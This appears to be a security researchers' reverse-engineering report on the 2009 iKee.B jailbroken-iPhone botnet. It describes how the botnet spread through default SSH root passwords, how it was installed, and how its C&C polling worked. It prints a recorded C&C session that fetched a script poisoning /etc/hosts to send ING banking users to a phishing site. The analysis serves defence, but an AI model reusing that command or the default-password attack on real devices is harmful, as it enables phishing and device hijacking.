In early November 2009, Dutch users of jailbroken iPhones in T-Mobile's 3G IP range began experiencing extortion popup windows (Figure 1).  The popup window notifies the victim that the phone has been hacked, and then sends that victim to a website where a $5 ransom payment is demanded to remove the malware infection [1,2].    The teenage hacker who authored the malicious software (malware) had discovered that many jailbroken iPhones have been configured with a secure shell (SSH) network service with a known default root password of 'alpine'.   By simply scanning T-Mobile's Dutch IP range from the Internet for vulnerable SSH-enabled iPhones,  the misguided teenage hacker was able to upload a very simple ransomware application to a number of unsuspecting iPhone users before being caught and forced to pay back his victims.   

Very soon after this incident, around the week of 8 November, a second iPhone malware outbreak began in Australia, using the very same SSH vulnerability.  This time the malware did not just infect jailbroken iPhones, but would then convert the iPhone into a self-propagating worm, to infect other iPhones.  This worm, referred to as iKee.A, was developed by an Australian hacker named Ashley Towns [3].   The worm would install a wallpaper of the British 1980's pop star Rick Astley onto the victim's iPhone, and it succeeded in infecting an estimated 21,000 victims within about a week.   However, unlike the Dutch teenager who was sanctioned and who apologized [4],  Mr. Towns received some notoriety, and was subsequently offered a job by a leading Australian Software company, Mogeneration [5]. 

Nearly two weeks after the iKee.A incident, on 18 November, a new and more malicious iPhone malware was spotted by XS4ALL across parts of Europe [0].  This new malware, named iKee.B, or duh (the name of the bot's primary binary), was based on a nearly identical design of the iKee.A worm.  However, unlike iKee.A, this new malware includes command and control (C&C) logic to render all infected iPhones under the control of a bot master.  This latest Phone  malware,  though limited in its current growth potential, offers some insights into what one day may become a widespread threat, as Internet-tethered smartphones become more ubiquitously available.  

Figure 1 - iPhone Ransom Notice

In addition to self-propagation, the iKee.B bot client application introduces a C&C checkin service that enables the botmaster to upload and execute shell commands on all infected iPhone bot clients.    Each bot is programmed to poll a Linthuanian C&C server at 5 minute intervals for new control logic (iPhone shell scripts), allowing the bot to evolve and to (possibly) redirect  infected iPhones to  new C&Cs located anywhere on the Internet.    IKee clients create a unique bot ID, potentially enabling the C&C to send custom logic to invidual bot clients.  The iKee.B source code also incorporates a feature to exfiltrate the entire SMS database from the victim's iPhone.  While this SMS exfiltration feature has been widely reported in the media,   we have confirmed that this feature was disabled on the version of iKee.B released across the Internet.

In this report our focus is on providing a detailed reverse analysis of the iPhone bot client program logic.  To conduct our analysis we developed a modified version of the University of Massachusetts ARM decompiler [7].  Our modified decompiler allows us to properly render a C approximation of the original iKee.B source code, which we present in full in Appendix A.  The iKee.B bot client package used in this study is available in Appendix B.  Both appendices are password protected.  Researchers may contact us for access to these files.  

Consumer handheld devices have emerged as a potential new frontier for crimeware.   Owners of the newest generation of smartphones attached to GSM IP ranges or auto-connected to local WiFi networks should understand that the convenience of their Internet-tethered web, media, and email services,  comes with a (potentially) steep price. In fact, Internet-tethering phones that support complex applications and network services is an entire game changer.  Unlike the previous generation of cell phones that were at their worst susceptible to local Bluetooth hijacking, modern Internet-tethered cellphones are today suspectible to being  probed, fingerprinted, and surreptitiously exploited by hackers from anywhere on the Internet [8].

Although the iKee.B botnet discussed here admittedly offers a rather limited growth potential, iKee.B nevertheless provides an interesting proof of concept that much of the functionality we have grown to expect from PC-based botnets can be easily migrated into a light-weight smartphone application.   iKee.B demonstrates that a victim holding an iPhone in Australia, can be hacked from another iPhone located in Hungary, and forced to exfiltrate its user's private data to a Lithuania C&C server, which may then upload new instructions to steal financial data from the Australian user's online bank account.   While it is unclear just how well prepared smartphone users are to this new reality, it is clear that malware developers are preparing for this new reality right now.

To some degree, media attention regarding the iKee.B iPhone bot has been somewhat short lived - in a sense justified by the point that only jail-broken iPhone users were victimized.  Jailbreaking the iPhone has had some degree of popularity, and articles have been written to describe the various motivations why consumers have been attracted to jailbreaking their iPhones (e.g., [9]).   These reasons primarily involve users wanting to run apps that Apple refuses to sign and distribute via their iTunes service.  In addition, jailbreaking the iPhone is a prerequisite step to SIM unlocking,  which allows users to use their iPhones with unsanctioned GSM providers.  This Summer (2009), a survey suggested that roughly 10% of iPhone users jailbreak their phones [10].    While this is a small subset of users, future smart malware may eventually break through the iPhone jail locking or circumvent this issue, or may simply target other emerging smartphone platforms that do not restrict application installs, as does Apple.

Regardless of its size, we find the iKee.B botnet an interesting sample because it offers insights into the design of modern smartphone botnets.   Perhaps the most immediate observation regarding the iKee.B botnet is that it has a  very simple yet flexible code base, which given its target platform makes tremendous sense.   While its code base is small, all the  key functionality that we have grown to expect of PC botnets is also present in iKee.B:  it can self-propagate, it carries a malicious payload (data exfiltration), and it periodically probes its C&C for new control instructions.  iKee.B's C&C protocol is simply a periodic curl fetch from a small iPhone app, allowing the bot master to reprogram bot clients at will.   As with all Internet-based botnets,  iKee.B clients take full advantage of the Internet to find new victims, coordinate with their C&C, fetch new program logic, and to exfiltrate whatever content they find within their hosts.

In addition to the simplicity in its Internet interactions, overall program complexity in modern smartphones must also be of concern to malware developers.  Here, the application-layer architecture of modern smartphones may offer smartphone malware a more streamlined design in selecting and monitoring the user's interaction with the web.    iPhone users now typically interact with various websites via site-specific applications, such as the Wells Fargo iPhone app.   A quick survey of which apps installed on a victim iPhone will provide a malware author with a highly targeted list of what web accounts and services the iPhone user employs, and allows the malware to target those accounts and services directly by focusing on infiltrating those apps.    

As with all platform-specific malware infections, the iKee.B bot naturally raises questions regarding the general security of the infected platform: in this case the security of Apple's iPhone.   In short, an iKee.B infection is a self-inflicted wound. The act of jailbreaking one's iPhone (i.e., configuring the iPhone to install applications not approved and distributed via Apple)  does indeed introduce a degree of risk to the end user.  However, jail breaking the iPhone does not  in itself provide the infection vector. Rather, the actual vulnerability exploited by iKee.B and its recent brethren arose because some jail breaking applications leave the iPhone with an enabled SSH service set with a default password.   Users who jail break their iPhones but then reset  their default passwords are not subject to this attack.   After reviewing the iKee bot implementation, we do not see the need for security patches or other software updates from Apple to respond to this recent rash of attacks.

To conduct the reverse engineering and code analysis of iKee.B, we employed a combination of manual and automated analysis of all files contained in the iKee.B bot client package.    In this bot client package, iKee.B includes two binary applications written for the iPhone's ARM processor.   We analyzed these two ARM binaries using IDA Pro [11] to disassemble the code, and then employed the Desquirr [7] ARM processor decompiler to extract a C-like description of the binaries.  Desquirr runs as a plug-in for IDA, and can properly recognize the prologue and epilogue of functions compiled for the ARM processor.  However, this decompiler was insufficient for our analysis purposes, and we had to extend its functionality to address several important deficiencies.  Specifically, we extended the Desquirr decompiler to

1. Support the generation of high-level flow control constructs such as while loops 
   
2. Properly recognize function arguments
3. Properly track all references to the data segment.  This is a particularly important extension, as without it one cannot explicitly recognize string and constant references (a major deficit in code analysis)

Figure 2 illustrates the roles and interactions of the two binaries, two scripts, and two preference files that compose the iKee.B bot client.   An iKee.B iPhone infection begins with a remote attacker (e.g., a remote infected iPhone), which detects the existence of the victim iPhone SSH network service running with the default 'alpine' password.  Once a vulnerable iPhone is detected, the attacker performs a remote login to the victim iPhone  and then uploads and unpacks (via tar and gzip) the iKee.B files to the directory /private/var/mobile/home/.    iKee.B is now ready for installation on the victim iPhone.

Figure 2 - Structural Overview of iKee.B

Installation of iKee.B is performed by the inst shell script.   This script creates an iKee dedicated directory on the infected iPhone. It installs the preferences files com.apple.ksyslog.plist and com.apple.period. plist.  Next, it incorporates logic to archive all SMS messages on the infected iPhone and sends them, along with information about the infected device, to a server in Lithuania. However, the SMS data archiving instruction is commented out in the iKee.B version released on the Internet.   It also changes the SSH default password.  Details of how the inst script operates are discussed in Section 4.

Propagation logic, presented in Section 5, is configured and invoked using the com.apple.ksyslog.plist preference file.  This preference file causes the iPhone at each boot time to execute a binary named sshd, which  scans and propagates the malware to other iPhones that are vulnerable to the same SSH attack.  iKee.B's sshd binary conducts three independent scans:  1)  it scans the iPhone's local network address space, 2) it scans a randomly computed subnetwork on the Internet, and 3) it scans a list of ranges of IP addresses belonging to a set of mobile operators across Europe and Australia.  When a vulnerable iPhone is discovered, sshd uploads an image of iKee.B to the victim and forces the victim to execute the inst script.    .

iKee.B's botnet command and control logic is presented in Section 6.   This logic is implemented using the com.apple.period.plist preference file, which configures the iPhone to execute bot client checking script named syslog every 5 minutes.    The syslog script is charged with running the C&C checkin binary application named duh, which phones home to the C&C and retrieves new shell scripts to run on the victim iPhone.   The duh application builds a specially crafted HTTP GET request to an IP address parameter supplied by the syslog script.  This GET request includes the bot client's ID computed by the inst script (Section 4), which allows the C&C Server to identify individual iPhones, regardless of the current IP address these iPhones  happen to be using.

Installation of the iKee.B bot is performed by the inst script, as shown in Figure 3.   The script is invoked by the remote attacker, once the iKee.B package is upload and unpacked.   This script performs four primary functions.  First, the script creates a randomly generated ID for the bot client, which it uses to create a local directory for file storage.  Later, this ID is used in client-to-C&C coordination, allowing the bot master to uniquely identify its individual hosts.  

Second, the inst script installs the preference files com.apple.period.plist (Section 5) and com.apple.period. plist (Section 6) on the iPhone,  which are responsible for starting the self-propagation logic and botclient C&C logic, respectively.   These preference files are loaded each time the iPhone is rebooted, and ensure that the self-propagation and bot client control logic are performed continuously by the client.  

Third, the inst script collects and compresses all SMS message on the local iPhone into a single archive.   However, this logic is disabled on iKee.B versions released on the Internet.  In this archive, the script also stores information regarding the OS name and its local network configuration.   Inst then opens an HTTP connection to the address 92.61.38.16, and delivers this archive to the botnet C&C server:   

92.61.38.16
Location: Dilnius, Lithuania
Domain: Dedicated Serverland
Provider: UAB Hostex

Finally, inst changes the default SSH password from 'alpine' to a new fixed password value, as uncovered by Paul Ducklin's blog [12].   This is done via the SED statement in Figure 3, which replaces the encrypted form of the password 'alpine' with the encrypted form of the word 'ohshit'.

Figure 3:  iKee.B's installer -- the inst script

iKee.B propagates by scanning specific Internet IP address ranges for SSH services (port 22/TCP), and attempts to connect to responding services as root, using the password 'alpine'.   The actual scanning and infection logic of iKee.B is embedded in a binary application named sshd, which is configured to RunAtLoad, with KeepAlive enabled, via the preference file, com.apple.ksyslog.   When a vulnerable SSH-enabled iPhone is found,  sshd will upload a copy and unpack of iKee.B's 6-file package to the victim's iPhone, and then run the inst script (Section 4).   The primary control logic of the sshd application is presented in Figure 4.  

The left panel presents the main program loop of sshd, which iterates through a set of IP address ranges, calling the scanner routine (right panel) to visit and infect all vulnerable IPs within the given IP range.   A list of  statically programmed IP ranges targeted by sshd are shown in the RANGES array in Figure 4.   These IP ranges correspond to a strategic set of GSM IP ranges scattered across four countries in Europe and Australia.   Specifically, the GSM providers targeted by iKee.B are as follows: 

In addition to scanning the above selected mobile phone operator,  sshd also scans the iPhone's current local address subnetwork for other vulnerable iPhones, and well as the local (nonroutable) network address range, 192.168.0.0/16.   Such scanning may be of particular interest when the victim's iPhone opportunistically connects to a WiFi LAN for Internet tethering.   The selection of the random subnetwork to scan is produced using the following time-seeded random subnet generation algorithm:

All iKee.B clients are programmed to maintain an ongoing communication channel with a dedicated botnet server, 92.61.38.16. The purpose of iKee.B's C&C connection is to allow the bot master to send infected iPhones new shell script logic, possibly customized for the specific bot client based on its individual client ID.  The botnet checkin logic is installed by the inst script via the preference file com.apple.period.plist.   This configuration file programs the victim iPhone to run the syslog shell script every 300 seconds (5 minutes).   We present the syslog script in Figure 5.    

Figure 5:  Syslog C&C Checkin Script

The syslog script begins by retrieving the unique ID of the bot client created at installation time.  Syslog then invokes the duh application, providing duh with the target C&C IP address and a URL argument that includes the local bot client ID.   Duh builds a specially crafted HTTP GET request using the URL argument parameter passed by syslog, and sends this URL to the C&C's IP.    When the C&C server receives the bot client checkin, it has the option to send back new programming logic in the form of a new iPhone shell script.  This script is then redirected by syslog into a temporary file called .tmp.   Next,  syslog invokes the function check, which scrapes the .tmp file for valid iPhone shell script lines, and puts these lines in a file called /private/var/mobile/home/heh.     Finally, the check function invokes the heh script, effectively executing any commands the bot master wishes to issue to the infected iPhone.

Regarding the iKee.B C&C Server  - Reports indicate that the initial iKee.B C&C server (92.61.38.16) was taken down shortly after the outbreak.   However, there are confirmed reports that this C&C server was functioning at some point when the outbreak first appeared.  For example, it has been reported that iKee.B was used to monitor and redirect Dutch ING Direct customers to a phishing site to steal user account information [6].    This phishing site attack was accomplished via the C&C server uploading a script to poison the DNS host files of iKee.B-infected iPhones.  For the ING Direct attack, the following C&C interaction was recorded by a researcher during an iKee.B client checkin with the Lithuanian C&C:

          (iKee.B C&C BotNet Control Channel Session:  courtesy Mikko Hypponen, F-Secure.com)
 
01:      %  wget --user-agent="HTMLGET 1.0" 92.61.38.16/xml.p.php?id=12345
02:      --HH:MM:SS-- http://92.61.38.16/xml.p.php?id=12345
03:                             => `p.php@id=12345'
04:     resolving fsproxy1.f-secure.com[192.168.X.X[:4007... connected.
05:      Proxy request sent, awaiting response...  200 OK
06:      HH:MM:SS (59.57 KB/s) - `p.php@id=12345'  saved [61]
07: 
08:     %  cat    "p.php@id=01"
09:     #!/bin/sh
10:     #
11:     echo  "210.233.73.206  mijn.ing.nl"  >> /etc/hosts

On line 01, the researcher connects to the iKee.B Lithuanian C&C server using an HTTP Get request, which mirrors the checking string from the duh application.   In this case, the researcher reports his bot client ID to be 12345.  The server parses this URL, and responds with a shell script, which is then captured in a text file named "p.php@id=01" (line 06).    The research then displays the contents of the file (line 08),  which shows the file to now contain an bourne shell script.   On iKee.B-infected iPhones, this shell would be executed by the sylog script.  Line 11 shows that the scripts purpose is the poison the iPhone's DNS cache (/etc/hosts) by redirecting all requests to mijn.ing.nl to  210.233.72.206. 
 
In effect, line 11 line causes the iPhone to associate the IP address 210.233.72.206 to the Dutch ING Direct web site (mijn.ing.nl).    When a Dutch ING Direct account holder connects to the Dutch ING Direct website, the user is instead sent to a compromised Japanese eCommerce site (210.233.72.206), which serves a phishing web page that looks identical to the ING Direct website.   Any account login information submitted to this phishing site will presumably be exploited by the iKee.B botmaster to conduct financial fraud. 

      

We present an analysis of the iKee.B bot client.  iKee.B is a botnet that was release on 23 November 2009, and targeted iPhone users across several countries in Europe and Australia.  We have reversed engineered the iKee.B client binaries to an approximation of their original source code implementation, and present an analysis of the installation, attack propagation, and botnet coordination logic.

View the iKee.B C source code tree.  We are aware that others have posted iKee.A source code on the Internet.  iKee.B differs from iKee.A in the introduction of the botnet control logic and the malicious exfiltration logic.  Researchers may contact the authors for password access.